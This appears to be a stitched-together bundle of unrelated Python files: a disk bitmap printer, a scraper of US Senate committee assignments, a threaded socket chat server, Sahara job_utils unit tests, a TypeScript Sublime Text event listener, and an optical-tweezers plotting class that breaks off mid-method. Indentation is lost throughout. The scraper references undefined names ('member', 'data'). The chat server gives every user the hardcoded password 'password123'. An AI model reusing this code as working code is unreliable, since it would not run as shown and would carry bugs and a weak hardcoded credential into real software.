def print_draw_bitmap(self, bm, brief=False):
line = ""
blk = 0
blk_cyl = self.blkdev.sectors * self.blkdev.heads
found = False
for i in xrange(self.blkdev.num_blocks):
c = bm[i]
if ord(c) == 0:
c = '.'
else:
found = True
line += c
if i % self.blkdev.sectors == self.blkdev.sectors - 1:
line += " "
if i % blk_cyl == blk_cyl - 1:
if not brief or found:
print "%8d: %s" % (blk,line)
blk += blk_cyl
line = ""
found = False
|
|
import json
import lxml
from bs4 import BeautifulSoup
import re
import urllib2
def _get_soup(url):
# returns a beautiful soup object for further operations
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
response = opener.open(url)
return BeautifulSoup(response.read(), 'lxml')
def _get_url(year, month, day):
congress_number = str(_get_congress_number(year))
year = str(year)
month = str(month).zfill(2)
day = str(day).zfill(2)
url = 'https://www.gpo.gov/fdsys/pkg/CCAL-{c}scal-{y}-{m}-{d}/html/CCAL-{c}scal-{y}-{m}-{d}-pt2.htm'\
.format(c=congress_number,y=year,m=month,d=day)
return url
def _get_years(congress_number):
# linear algebra
return [2*congress_number + 1787,2*congress_number + 1788]
def _get_congress_number(year):
if year%2==1:
return (year-1787)/2
else:
return (year-1788)/2
def _is_valid_page(soup):
text = soup.text
if re.search('Error Detected - The page you requested cannot be found.',text):
return False
else:
return True
def _get_date_from_url(url):
base_index = url.find('scal-')
# year = url[base_index+5:base_index+9]
# month = url[base_index+10:base_index+12]
# day = url[base_index+13:base_index+15]
return url[base_index+5:base_index+15]
def scan_on_a_congress_number(congress_number):
years = _get_years(congress_number)
months = range(1,13)
days = range(1,32)
urls = []
for year in years:
for month in months:
for day in days:
url = _get_url(year, month, day)
urls.append(url)
print '****** Finished creating all urls'
soups = []
valid_dates = []
for url in urls:
try:
soup = _get_soup(url)
soups.append(soup)
date = _get_date_from_url(url)
valid_dates.append(date)
except urllib2.HTTPError:
print 'HTTPError occurred at ' + url
except urllib2.URLError:
print 'URLError occurred at ' + url
except:
print '**** An unexpect error occurred at ' + url
raise
continue
print '****** Finshied downloading all htmls'
all_committee_assignment_data = []
for soup in soups:
committee_assignment_data = _get_committee_assignments(soup)
all_committee_assignment_data.append(committee_assignment_data)
print '****** Finished fetching all committee assignment data'
result = {}
for index in range (0, len(all_committee_assignment_data)):
members = all_committee_assignment_data[index]
keys = members.keys()
for key in keys:
if result.has_key(key):
for committee_assignment_name in member[key]['committee_assignments']:
result[key]['committee_assignments'][committee_assignment_name]['last_seen_date'] = valid_dates[index]
else:
result[key]={}
result[key]['state'] = members[key]['state']
result[key]['committee_assignments'] = {}
for committee_assignment_name in members[key]['committee_assignments']:
result[key]['committee_assignments'][committee_assignment_name] = {}
result[key]['committee_assignments'][committee_assignment_name]['start_date'] = valid_dates[index]
print 'finished parsing all data'
return result
def _get_committee_assignments(soup):
text = soup.find('pre').text
lines = text.split('\n')
results = {}
member = ''
current_committee_assignment = ''
for line in lines:
if _is_meaningful_line(line):
# print line + ' is meaningful'
line_type = _get_line_type(line)
if line_type == 'member':
display_name = _get_display_name(line)
state = _get_state(line)
# role = _get_role(line)
if results.has_key(display_name):
if _get_role(line) != 'member':
results[display_name]['committee_assignments'].append(current_committee_assignment + ', ' + _get_role(line))
else:
results[display_name]['committee_assignments'].append(current_committee_assignment)
else:
results[display_name] = {}
results[display_name]['state'] = state
# results[display_name]['role'] = role
results[display_name]['committee_assignments'] = []
if _get_role(line) != 'member':
results[display_name]['committee_assignments'].append(current_committee_assignment + ', ' + _get_role(line))
else:
results[display_name]['committee_assignments'].append(current_committee_assignment)
elif line_type == 'assignment':
current_committee_assignment = line.strip().title().replace('And','and')
# print 'here is a new committee ' + current_committee_assignment
else:
print 'this line is neither a committe nor a member'
print line
print '\n'
return results
def _is_meaningful_line(line):
line = line.replace('_','').strip()
black_list = ['COMMITTEE ASSIGNMENTS','STANDING COMMITTEES',',']
if (re.search('[\[\]]',line)!=None) or (line=='') or (line in black_list):
# lines that include brackets are usually only for
# page number, date of document and source of data
return False
else:
# print line + ' is meaningful'
return True
def _get_line_type(line):
line = line.strip()
if line.upper() == line:
print line + ' is an assignment'
# the specific committee assignment name is displayed
# as a string all in capital words
return 'assignment'
elif re.search(', of ',line):
# name, of state_full_name(, Chairman) <== optional
return 'member'
else:
print 'the following line was not recognized as either assignment or member'
print line
print '\n'
return None
def _get_display_name(member_line):
# Barbara A. Mikulski, of Maryland, Chairman
return member_line.split(', of ')[0]
def _get_state(member_line):
# Barbara A. Mikulski, of Maryland, Chairman
return member_line.split(', of ')[1].split(', ')[0]
def _get_role(member_line):
# Barbara A. Mikulski, of Maryland, Chairman
if len(member_line.split(', of ')[1].split(', ')) == 2:
return member_line.split(', of ')[1].split(', ')[1]
elif len(member_line.split(', of ')[1].split(', ')) == 1:
return 'member'
else:
print 'cannot extract role from the follow line'
print member_line
print '\n'
if __name__ == '__main__':
date = scan_on_a_congress_number(112)
with open('scan_on_112_congress.JSON','w') as outfile:
json.dump(data, outfile, indent=4)
|
|
import socket
import sys
import threading
import CommonUtil
import functools
import time
import re
from messages.Message import Message as Message
from database.databaseinterface import databaseinterface
#welcom message sent to every user apon login
def welcome_message():
msg = Message('0000000000000000', '0000000000000000', 'server', '0000000000000000', 'welcome to TDO communication services','message')
return msg
db = databaseinterface()
class User:
def __init__(self, alias, userid, inport,outport):
self.alias = alias
self.id = userid
self.inport = inport
self.outport = outport
self.password ='password123'
self.currentchannel='0000000000000000'
self.channels = []
self.blockedChannels = []
#will add method for changing inport/outport in db
# todo implement DB connection
class Channel:
def __init__(self, name, permissions, id, blockedUsers=[]):
self.name = name
self.blockedUsers = []
self.users = []
self.id = id
self.permisions = permissions
#used to create a new channel, init is used to fetch existing one from db
@staticmethod
def createNew(name, permissions):
if name == 'General':
id = '0000000000000000'
else:
id = CommonUtil.createID()
ch = Channel(name, permissions, id)
regex = re.match(r'([01]{3})', permissions)
if regex:
ch.permisions = permissions
else:
ch.permisions = '011'
db.newChannel(ch)
return ch
# ----------------------------------------------------------------------------------------------------------------------------------
# Server class and subclasses
# ----------------------------------------------------------------------------------------------------------------------------------
class Server:
def __init__(self):
self.Outbound = {}
self.Inbound = CommonUtil.Queue()
self.Error = CommonUtil.Queue()
self.Channels = []
self.Channels.append(Channel('General','011','0000000000000000'))
self.handler = self.PortHandler()
self.users = []
class PortHandler:
def __init__(self):
self.port = []
for i in range(20000, 10000, -1):
self.port.append(i)
# handler method for outbound connections
@staticmethod
def send(s, p):
msg = s.Outbound[p].Pop()
if msg:
return msg.encode()
@staticmethod
def error():
print('user left channel')
# handler method for inbound connections
def enqueue(self, p, d):
def validate(d):
pass
validate(d)
msg = Message.decode(d)
self.Inbound.Push(msg)
def dequeue(self):
while True:
msg = self.Inbound.Pop()
if msg: # pop returns none if nothing is on que, not entering processing
if msg.messageType == 'command': # checking if message is a command
# for loop runs over every command type, only one matches, running inner if once for processing
for command in CommonUtil.commands:
regex = re.match(CommonUtil.commands[command], msg.message)
print regex.group(0)
if regex:
if command == 'join':
ch = db.getChannel(regex.group(0))
if ch:
error= db.addUser(msg.messageChannelId, msg.messageSenderId) # returns none if successful
if error:
pass # send error
if command == 'create':
ch = db.getChannel(regex.group(0))
if ch:
pass # send user duplicate channel name error msg
else:
c = Channel.createNew(regex.group(0), regex.group(1))
error = db.newChannel(c)
if error:
pass # send error message
else:
db.addUser(c.id, msg.messageSenderId)
if command == 'set_alias':
if db.getUserAlias(regex.group(0)):
pass # send error message
else:
u = None #will add user initialization
db.changeUser(msg.messageSenderId, u)
if command == 'block':
if db.userHasPermisions(msg.messageSenderId, msg.messageChannelId):
if db.getUser(regex.group(0)):
db.getChannel(msg.messageChannelId).blockUser(db.getUser(regex.group(0)))
if command == 'unblock':
if db.userHasPermisions(msg.messageSenderId, msg.messageChannelId):
if db.getUser(regex.group(0)):
db.UnblockUser(msg.messageChannelId, regex.group(0))
if command == 'delete':
if db.userHasPermisions(msg.messageSenderId, msg.messageChannelId):
if db.deleteChannel(msg.messageChannelId):
pass#send error(unable to delete)
else:
pass#send permissions error
if command == 'chmod':
if db.userHasPermisions(db.getUser(msg.messageSenderId), db.getChannel(msg.messageChannelId)):
if regex.group(0) == msg.messageChannelId:
db.setChannelPermisions(msg.messageChannelId)
elif db.IsMember(msg.messageChannelId, msg.messageChannelId):
db.SetChannelPermisions(msg.messageChannelId, msg.messageChannelId, regex.group(1))
else:
pass # send error msg
else:
pass # send command not found error message
else:
print(msg.message)
for u in self.users:
if u.id != msg.messageSenderId and u.currentchannel == msg.messageChannelId:
self.Outbound[u.inport].Push(msg)
if __name__ == '__main__':
server = Server()
threading._start_new_thread(server.dequeue, ()) # starts thread for handling outbound messages
# setting up port for connecting to clients
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = socket.gethostname()
port = 9999
server_socket.bind((host, port))
server_socket.listen(10)
#while loop for handling new connections
while True:
clientsocket, addr = server_socket.accept()
print('Got a connection from %s' % str(addr))
p1 = server.handler.port.pop()
p2 = server.handler.port.pop()
alias = clientsocket.recv(1024)
user = db.getUserAlias(alias)
if user:
user = User(user[0], user[1], p1, p2)
uID = user[2]
else:
uID=CommonUtil.createID()
user = User(alias,uID,p1,p2)
db.newUser(user)
# sending the client the information on ports used
k = str(uID) + '|' + str(p1)+'|'+str(p2)
clientsocket.send(k.encode('utf8'))
# starting threads to manage connection
server.Outbound[p1] = CommonUtil.Queue()
server.Outbound[p1].Push(welcome_message())
server.users.append(user)
threading._start_new_thread(CommonUtil.outbound_connection_handler, (p1, functools.partial(server.send, server),server.error,))
time.sleep(0.05)
threading._start_new_thread(CommonUtil.inbound_connection_handler, (p2, functools.partial(server.enqueue, server),server.error,))
clientsocket.close()
|
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import mock
import six
import testtools
from sahara import conductor as cond
from sahara.service.edp import job_utils
from sahara.tests.unit.service.edp import edp_test_utils as u
conductor = cond.API
class JobUtilsTestCase(testtools.TestCase):
def setUp(self):
super(JobUtilsTestCase, self).setUp()
def test_args_may_contain_data_sources(self):
job_configs = None
# No configs, default false
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name | by_uuid)
# Empty configs, default false
job_configs = {'configs': {}}
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name | by_uuid)
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: True}
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertTrue(by_name & by_uuid)
job_configs['configs'][job_utils.DATA_SOURCE_SUBST_NAME] = False
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name)
self.assertTrue(by_uuid)
job_configs['configs'][job_utils.DATA_SOURCE_SUBST_UUID] = False
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertFalse(by_name | by_uuid)
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: 'True',
job_utils.DATA_SOURCE_SUBST_UUID: 'Fish'}
by_name, by_uuid = job_utils.may_contain_data_source_refs(job_configs)
self.assertTrue(by_name)
self.assertFalse(by_uuid)
def test_find_possible_data_source_refs_by_name(self):
id = six.text_type(uuid.uuid4())
job_configs = {}
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_name(
job_configs))
name_ref = job_utils.DATA_SOURCE_PREFIX+'name'
name_ref2 = name_ref+'2'
job_configs = {'args': ['first', id],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_name(
job_configs))
job_configs = {'args': [name_ref, id],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual(
['name'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
job_configs = {'args': ['first', id],
'configs': {'config': name_ref},
'params': {'param': 'value'}}
self.assertEqual(
['name'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
job_configs = {'args': ['first', id],
'configs': {'config': 'value'},
'params': {'param': name_ref}}
self.assertEqual(
['name'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
job_configs = {'args': [name_ref, name_ref2, id],
'configs': {'config': name_ref},
'params': {'param': name_ref}}
self.assertItemsEqual(
['name', 'name2'],
job_utils.find_possible_data_source_refs_by_name(job_configs))
def test_find_possible_data_source_refs_by_uuid(self):
job_configs = {}
name_ref = job_utils.DATA_SOURCE_PREFIX+'name'
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_uuid(
job_configs))
id = six.text_type(uuid.uuid4())
job_configs = {'args': ['first', name_ref],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual([],
job_utils.find_possible_data_source_refs_by_uuid(
job_configs))
job_configs = {'args': [id, name_ref],
'configs': {'config': 'value'},
'params': {'param': 'value'}}
self.assertEqual(
[id],
job_utils.find_possible_data_source_refs_by_uuid(job_configs))
job_configs = {'args': ['first', name_ref],
'configs': {'config': id},
'params': {'param': 'value'}}
self.assertEqual(
[id],
job_utils.find_possible_data_source_refs_by_uuid(job_configs))
job_configs = {'args': ['first', name_ref],
'configs': {'config': 'value'},
'params': {'param': id}}
self.assertEqual(
[id],
job_utils.find_possible_data_source_refs_by_uuid(job_configs))
id2 = six.text_type(uuid.uuid4())
job_configs = {'args': [id, id2, name_ref],
'configs': {'config': id},
'params': {'param': id}}
self.assertItemsEqual([id, id2],
job_utils.find_possible_data_source_refs_by_uuid(
job_configs))
@mock.patch('sahara.context.ctx')
@mock.patch('sahara.conductor.API.data_source_get_all')
def test_resolve_data_source_refs(self, data_source_get_all, ctx):
ctx.return_value = 'dummy'
name_ref = job_utils.DATA_SOURCE_PREFIX+'input'
job_exec_id = six.text_type(uuid.uuid4())
input = u.create_data_source("swift://container/input",
name="input",
id=six.text_type(uuid.uuid4()))
output = u.create_data_source("swift://container/output.%JOB_EXEC_ID%",
name="output",
id=six.text_type(uuid.uuid4()))
output_url = "swift://container/output." + job_exec_id
by_name = {'input': input,
'output': output}
by_id = {input.id: input,
output.id: output}
# Pretend to be the database
def _get_all(ctx, **kwargs):
name = kwargs.get('name')
if name in by_name:
name_list = [by_name[name]]
else:
name_list = []
id = kwargs.get('id')
if id in by_id:
id_list = [by_id[id]]
else:
id_list = []
return list(set(name_list + id_list))
data_source_get_all.side_effect = _get_all
job_configs = {
'configs': {
job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: True},
'args': [name_ref, output.id, input.id]}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(2, len(ds))
self.assertEqual([input.url, output_url, input.url], nc['args'])
# Swift configs should be filled in since they were blank
self.assertEqual(input.credentials['user'],
nc['configs']['fs.swift.service.sahara.username'])
self.assertEqual(input.credentials['password'],
nc['configs']['fs.swift.service.sahara.password'])
job_configs['configs'] = {'fs.swift.service.sahara.username': 'sam',
'fs.swift.service.sahara.password': 'gamgee',
job_utils.DATA_SOURCE_SUBST_NAME: False,
job_utils.DATA_SOURCE_SUBST_UUID: True}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(2, len(ds))
self.assertEqual([name_ref, output_url, input.url], nc['args'])
# Swift configs should not be overwritten
self.assertEqual(job_configs['configs'], nc['configs'])
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: False}
job_configs['proxy_configs'] = {'proxy_username': 'john',
'proxy_password': 'smith',
'proxy_trust_id': 'trustme'}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(1, len(ds))
self.assertEqual([input.url, output.id, input.id], nc['args'])
# Swift configs should be empty and proxy configs should be preserved
self.assertEqual(job_configs['configs'], nc['configs'])
self.assertEqual(job_configs['proxy_configs'], nc['proxy_configs'])
# Substitution not enabled
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: False,
job_utils.DATA_SOURCE_SUBST_UUID: False}
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(0, len(ds))
self.assertEqual(job_configs['args'], nc['args'])
self.assertEqual(job_configs['configs'], nc['configs'])
# Substitution enabled but no values to modify
job_configs['configs'] = {job_utils.DATA_SOURCE_SUBST_NAME: True,
job_utils.DATA_SOURCE_SUBST_UUID: True}
job_configs['args'] = ['val1', 'val2', 'val3']
ds, nc = job_utils.resolve_data_source_references(job_configs,
job_exec_id, {})
self.assertEqual(0, len(ds))
self.assertEqual(nc['args'], job_configs['args'])
self.assertEqual(nc['configs'], job_configs['configs'])
def test_construct_data_source_url_no_placeholders(self):
base_url = "swift://container/input"
job_exec_id = six.text_type(uuid.uuid4())
url = job_utils._construct_data_source_url(base_url, job_exec_id)
self.assertEqual(base_url, url)
def test_construct_data_source_url_job_exec_id_placeholder(self):
base_url = "swift://container/input.%JOB_EXEC_ID%.out"
job_exec_id = six.text_type(uuid.uuid4())
url = job_utils._construct_data_source_url(base_url, job_exec_id)
self.assertEqual(
"swift://container/input." + job_exec_id + ".out", url)
def test_construct_data_source_url_randstr_placeholder(self):
base_url = "swift://container/input.%RANDSTR(4)%.%RANDSTR(7)%.out"
job_exec_id = six.text_type(uuid.uuid4())
url = job_utils._construct_data_source_url(base_url, job_exec_id)
self.assertRegex(
url, "swift://container/input\.[a-z]{4}\.[a-z]{7}\.out")
|
|
import sublime_plugin
from ..libs.view_helpers import *
from ..libs import *
from .event_hub import EventHub
class TypeScriptEventListener(sublime_plugin.EventListener):
"""To avoid duplicated behavior among event listeners"""
# During the "close all" process, handling on_activated events is
# undesirable (not required and can be costly due to reloading buffers).
# This flag provides a way to know whether the "close all" process is
# happening so we can ignore unnecessary on_activated callbacks.
about_to_close_all = False
def on_activated(self, view):
log.debug("on_activated")
if TypeScriptEventListener.about_to_close_all:
return
if is_special_view(view):
self.on_activated_special_view(view)
else:
info = get_info(view)
if info:
self.on_activated_with_info(view, info)
def on_activated_special_view(self, view):
log.debug("on_activated_special_view")
EventHub.run_listeners("on_activated_special_view", view)
def on_activated_with_info(self, view, info):
log.debug("on_activated_with_info")
EventHub.run_listeners("on_activated_with_info", view, info)
def on_modified(self, view):
"""
Usually called by Sublime when the buffer is modified
not called for undo, redo
"""
log.debug("on_modified")
if is_special_view(view):
self.on_modified_special_view(view)
else:
info = get_info(view)
if info:
self.on_modified_with_info(view, info)
self.post_on_modified(view)
def on_modified_special_view(self, view):
log.debug("on_modified_special_view")
EventHub.run_listeners("on_modified_special_view", view)
def on_modified_with_info(self, view, info):
log.debug("on_modified_with_info")
# A series state-updating for the info object to sync the file content on the server
info.modified = True
# Todo: explain
if IS_ST2:
info.modify_count += 1
info.last_modify_change_count = change_count(view)
last_command, args, repeat_times = view.command_history(0)
if info.pre_change_sent:
# change handled in on_text_command
info.client_info.change_count = change_count(view)
info.pre_change_sent = False
else:
if last_command == "insert":
if (
"\n" not in args['characters'] # no new line inserted
and info.prev_sel # it is not a newly opened file
and len(info.prev_sel) == 1 # not a multi-cursor session
and info.prev_sel[0].empty() # the last selection is not a highlighted selection
and not info.client_info.pending_changes # no pending changes in the buffer
):
info.client_info.change_count = change_count(view)
prev_cursor = info.prev_sel[0].begin()
cursor = view.sel()[0].begin()
key = view.substr(sublime.Region(prev_cursor, cursor))
send_replace_changes_for_regions(view, static_regions_to_regions(info.prev_sel), key)
# mark change as handled so that on_post_text_command doesn't try to handle it
info.change_sent = True
else:
# request reload because we have strange insert
info.client_info.pending_changes = True
# Reload buffer after insert_snippet.
# For Sublime 2 only. In Sublime 3, this logic is implemented in
# on_post_text_command callback.
# Issue: https://github.com/Microsoft/TypeScript-Sublime-Plugin/issues/277
if IS_ST2 and last_command == "insert_snippet":
reload_buffer(view);
# Other listeners
EventHub.run_listeners("on_modified_with_info", view, info)
def post_on_modified(self, view):
log.debug("post_on_modified")
EventHub.run_listeners("post_on_modified", view)
def on_selection_modified(self, view):
"""
Called by Sublime when the cursor moves (or when text is selected)
called after on_modified (when on_modified is called)
"""
log.debug("on_selection_modified")
# Todo: why do we only check this here? anyway to globally disable the listener for non-ts files
if not is_typescript(view):
return
EventHub.run_listeners("on_selection_modified", view)
info = get_info(view)
if info:
self.on_selection_modified_with_info(view, info)
def on_selection_modified_with_info(self, view, info):
log.debug("on_selection_modified_with_info")
if not info.client_info:
info.client_info = cli.get_or_add_file(view.file_name())
if (
info.client_info.change_count < change_count(view)
and info.last_modify_change_count != change_count(view)
):
# detected a change to the view for which Sublime did not call
# 'on_modified' and for which we have no hope of discerning
# what changed
info.client_info.pending_changes = True
# save the current cursor position so that we can see (in
# on_modified) what was inserted
info.prev_sel = regions_to_static_regions(view.sel())
EventHub.run_listeners("on_selection_modified_with_info", view, info)
def on_load(self, view):
log.debug("on_load")
EventHub.run_listeners("on_load", view)
def on_window_command(self, window, command_name, args):
log.debug("on_window_command")
if command_name == "hide_panel" and cli.worker_client.started():
cli.worker_client.stop()
elif command_name == "exit":
cli.service.exit()
elif command_name in ["close_all", "close_window", "close_project"]:
# Only set <about_to_close_all> flag if there exists at least one
# view in the active window. This is important because we need
# some view's on_close callback to reset the flag.
window = sublime.active_window()
if window is not None and window.views():
TypeScriptEventListener.about_to_close_all = True
def on_text_command(self, view, command_name, args):
"""
ST3 only (called by ST3 for some, but not all, text commands)
for certain text commands, learn what changed and notify the
server, to avoid sending the whole buffer during completion
or when key can be held down and repeated.
If we had a popup session active, and we get the command to
hide it, then do the necessary clean up.
"""
log.debug("on_text_command")
EventHub.run_listeners("on_text_command", view, command_name, args)
info = get_info(view)
if info:
self.on_text_command_with_info(view, command_name, args, info)
def on_text_command_with_info(self, view, command_name, args, info):
log.debug("on_text_command_with_info")
info.change_sent = True
info.pre_change_sent = True
if command_name == "left_delete":
# backspace
send_replace_changes_for_regions(view, left_expand_empty_region(view.sel()), "")
elif command_name == "right_delete":
# delete
send_replace_changes_for_regions(view, right_expand_empty_region(view.sel()), "")
else:
# notify on_modified and on_post_text_command events that
# nothing was handled. There are multiple flags because Sublime
# does not always call all three events.
info.pre_change_sent = False
info.change_sent = False
info.modified = False
EventHub.run_listeners("on_text_command_with_info", view, command_name, args, info)
def on_post_text_command(self, view, command_name, args):
"""
ST3 only
called by ST3 for some, but not all, text commands
not called for insert command
"""
log.debug("on_post_text_command")
info = get_info(view)
if info:
if not info.change_sent and info.modified:
self.on_post_text_command_with_info(view, command_name, args, info)
# we are up-to-date because either change was sent to server or
# whole buffer was sent to server
info.client_info.change_count = view.change_count()
# reset flags and saved regions used for communication among
# on_text_command, on_modified, on_selection_modified,
# on_post_text_command, and on_query_completion
info.change_sent = False
info.modified = False
info.completion_sel = None
def on_post_text_command_with_info(self, view, command_name, args, info):
log.debug("on_post_text_command_with_info")
if command_name not in \
["commit_completion",
"insert_best_completion",
"typescript_format_on_key",
"typescript_format_document",
"typescript_format_selection",
"typescript_format_line",
"typescript_paste_and_format"]:
# give up and send whole buffer to server (do this eagerly
# to avoid lag on next request to server)
reload_buffer(view, info.client_info)
EventHub.run_listeners("on_post_text_command_with_info", view, command_name, args, info)
def on_query_completions(self, view, prefix, locations):
log.debug("on_query_completions")
return EventHub.run_listener_with_return("on_query_completions", view, prefix, locations)
def on_query_context(self, view, key, operator, operand, match_all):
log.debug("on_query_context")
return EventHub.run_listener_with_return("on_query_context", view, key, operator, operand, match_all)
def on_close(self, view):
log.debug("on_close")
file_name = view.file_name()
info = get_info(view, open_if_not_cached=False)
if info:
info.is_open = False
if view.is_scratch() and view.name() == "Find References":
cli.dispose_ref_info()
else:
# info = get_info(view)
# if info:
# if info in most_recent_used_file_list:
# most_recent_used_file_list.remove(info)
# notify the server that the file is closed
cli.service.close(file_name)
# If this is the last view that is closed by a close_all command,
# reset <about_to_close_all> flag.
if TypeScriptEventListener.about_to_close_all:
window = sublime.active_window()
if window is None or not window.views():
TypeScriptEventListener.about_to_close_all = False
log.debug("all views have been closed")
def on_pre_save(self, view):
log.debug("on_pre_save")
check_update_view(view)
def on_hover(self, view, point, hover_zone):
log.debug("on_hover")
EventHub.run_listeners("on_hover", view, point, hover_zone)
|
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 21:36:44 2016
@author: Tobias Jachowski
"""
import matplotlib.pyplot as plt
import numpy as np
from pyoti.modification.modification import Modification, GraphicalMod
from pyoti import helpers as hp
from pyoti.evaluate import signal as sn
from pyoti.evaluate import tether as tr
class IRotation(GraphicalMod):
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Define some attributes needed for the graphical visualization of the
# spline
# plateaus [excited_psd, excited_position] for left and right stress
# regions
self.rightextension = None
self.leftextension = None
self.rightforce = {}
self.leftforce = {}
# Dimensions of the buttons to adjust the plateaus:
self.left = 0.1
self.bottom = 0.79
self.width = 0.0625
self.height = 0.046875
self.bspace = 0.01
self.lspace = 0.01333
# create some properties of actions/corresponding buttons
action = ['upX', 'downX', 'upY', 'downY', 'upZ', 'downZ', 'rotlX', 'rotrX', 'rotlY', 'rotrY', 'rotlZ', 'rotrZ']
label = ['upX', 'downX', 'upY', 'downY', 'upZ', 'downZ', 'rotlX', 'rotrX', 'rotlY', 'rotrY', 'rotlZ', 'rotrZ']
offsetX = [-0.0025, 0.0025, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
offsetY = [ 0.0, 0.0, -0.0025, 0.0025, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
offsetZ = [ 0.0, 0.0, 0.0, 0.0, -0.0025, 0.0025, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
rotateX = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5, -0.5, 0.0, 0.0, 0.0, 0.0 ]
rotateY = [ 0.0, 0.0, 0.0, 0.0, 0.0, -0.0, 0.0, 0.0, 0.5, -0.5, 0.0, 0.0 ]
rotateZ = [ 0.0, 0.0, 0.0, 0.0, 0.0, -0.0, 0.0, 0.0, 0.0, 0.0, 0.5, -0.5 ]
row = [ 1, 0, -6, -7, -6, -7, 1, 0, 1, 0, 1, 0 ]
column = [ 6, 6, 0, 0, 6, 6, 0, 0, 1, 1, 2, 2 ]
self.action = action
self.label = dict(list(zip(action, label)))
self.offsetX = dict(list(zip(action, offsetX)))
self.offsetY = dict(list(zip(action, offsetY)))
self.offsetZ = dict(list(zip(action, offsetZ)))
self.rotateX = dict(list(zip(action, rotateX)))
self.rotateY = dict(list(zip(action, rotateY)))
self.rotateZ = dict(list(zip(action, rotateZ)))
self.row = dict(list(zip(action, row)))
self.column = dict(list(zip(action, column)))
self._axes = ['3D', 'X', 'Y', 'Z']
self._lines = {}
self.supertitle = None
self._button = {}
def _figure(self):
"""
Interactive determination of rotation angle.
"""
# Adjust the angles for rotation of of the QPD signal
# create new figure and axes for adjusting the angles
plot_params = {'wspace': 0.09, 'hspace': 0.08}
self._set_plot_params(plot_params)
figure, ax_ = plt.subplots(2, 2, sharex=True, sharey=False)
ax = dict(list(zip(self._axes, ax_.flatten())))
# Create buttons for interactive correction of plateaus and assign
# correct functions
# See http://math.andrej.com/2009/04/09/pythons-lambda-is-broken/ for
# explanation of weird function assignment
ax_button = {}
for ac in self.action:
ax_button[ac] \
= figure.add_axes([self.column[ac] *
(self.lspace + self.width) +
self.left, self.row[ac] *
(self.bspace + self.height) +
self.bottom,
self.width,
self.height])
self._button[ac] = plt.Button(ax_button[ac], self.label[ac])
def ap(event, ac=ac):
self._adjust_plateaus(ac)
# connect button to action, accordingly
self._button[ac].on_clicked(ap)
# create lines to plot the data
for plot in self._axes:
self._lines['left' + plot] = ax[plot].plot([0], [0], 'r',
alpha=0.75)[0]
self._lines['right' + plot] = ax[plot].plot([0], [0], 'g',
alpha=0.75)[0]
ax[plot].ticklabel_format(useOffset=False)
ax[plot].grid(True)
ax['3D'].set_ylabel('Force (pN)')
ax['Y'].set_ylabel('Force (pN)')
ax['Y'].set_xlabel('Extension (nm)')
ax['Z'].set_xlabel('Extension (nm)')
self.supertitle = figure.suptitle("Adjust plateaus to make them "
"overlap")
return figure
def _update_fig(self, **kwargs):
"""
Update the plot
"""
# prepare data for interactive plot
self.calculate_plateaus()
for plot in self._axes:
l_line = self._lines['left' + plot]
r_line = self._lines['right' + plot]
l_line.set_data(self.leftextension * 1e9,
self.leftforce[plot] * 1e12)
r_line.set_data(self.rightextension * 1e9,
self.rightforce[plot] * 1e12)
# recompute ax.dataLim
l_line.axes.relim()
# update ax.viewLim using new dataLim
l_line.axes.autoscale_view()
def _pre_close_fig(self):
# Store attachment fit plot for ducumentation
self.supertitle.set_text('Adjusted plateaus')
self._lines.clear()
self._button.clear()
self.supertitle = None
def _adjust_plateaus(self, action):
"""
Adjusts the attachment (offset of excited_position) and the the scaling
factor to correct for differences of left and right DNA overstretching
plateaus. It is interactively called from the data plot (see below) and
updates the plot accordingly.
"""
# change offset and scaling for plateaus
self.modification.iattributes.offsetPsdX += self.offsetX[action]
self.modification.iattributes.offsetPsdY += self.offsetY[action]
self.modification.iattributes.offsetPsdZ += self.offsetZ[action]
self.modification.iattributes.angleX += self.rotateX[action]
self.modification.iattributes.angleY += self.rotateY[action]
self.modification.iattributes.angleZ += self.rotateZ[action]
# recalculate the plateaus with the new offset and scaling values
